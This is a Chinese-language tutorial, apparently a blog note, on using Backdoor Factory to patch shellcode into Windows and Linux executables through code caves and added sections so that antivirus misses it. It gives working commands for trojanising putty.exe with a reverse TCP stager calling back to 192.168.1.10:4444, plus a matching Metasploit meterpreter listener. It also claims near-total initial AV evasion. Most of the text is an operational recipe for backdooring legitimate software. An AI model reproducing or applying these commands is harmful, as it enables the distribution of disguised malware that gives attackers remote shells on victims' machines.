Backdoor-------python編寫
適用於windows PE x32/x64 和Linux ELF x32/x64(OSX),支持msf payload 自定義payload
將shellcode代碼patch進行模板文件,躲避AV檢查
Patch:
通過替換exe,dll,注冊表等方法修復系統漏洞或問題的方法
BDF:向二進制文件中增加或刪除代碼內容,某些受保護的二進制程序無法patch,存在一定概率文件會被patch壞掉
CTP方法--------增加新的代碼段section,與msf的-k方法類似,使用現有的代碼裂縫(code cave)存放shellcode
代碼裂縫-------二進制文件中超過兩個字節的連續x00區域(代碼片段間區域),根據統計判斷代碼縫隙是編譯器在進行編譯時造成的,不同的編譯器造成的代碼縫隙大小不同
hexeditor查看某程序的代碼裂縫
單個代碼洞大小不足以存放完整的shellcode,多個代碼洞跳轉--非順序執行(初期免殺率可達100%),結合msf的stager方法
patch選項----附加代碼段,單代碼注入,多代碼注入
常用參數:
-f 指定某程序注入payload
-S 檢查當前文件是否支持注入后門
-s 可以使用的有效負載,使用“show”來查看有效載荷
-H 接受反彈會話的ip主機
-c 代碼裂縫,確定支持patch 后,查看其是否支持指定的 shellcode patch
-l 代碼裂縫大小
-J 使用多代碼縫隙跳轉的方式
-a 使用add-new-section添加代碼段
backdoor-factory -f putty.exe -S(查看是否支持注入后門)
backdoor-factory -f putty.exe -s show(查看支持的有效負載有哪些)
backdoor-factory -f putty.exe -s show iat_reverse_tcp_stager_threaded -H 192.168.1.10 -P 4444(使用iat_reverse_tcp_stager_threaded負載)
使用 msf 偵聽
set payload windows/meterpreter/revers_tcp set LHOST 192.168.1.10 set LPORT 4444 exploit
backdoor-factory -f putty.exe -s show iat_reverse_tcp_stager_threaded -H 192.168.1.10 -P 4444 -J(使用多代碼縫隙跳轉的方式)
backdoor-factory -f putty.exe -s show iat_reverse_tcp_stager_threaded -H 192.168.1.10 -P 4444 -a(使用add-new-section添加代碼段)
使用 msf 偵聽
set payload windows/meterpreter/revers_tcp set LHOST 192.168.1.10 set LPORT 4444 exploit
友情鏈接 http://www.cnblogs.com/klionsec
http://www.cnblogs.com/l0cm
http://www.cnblogs.com/Anonyaptxxx
http://www.feiyusafe.cn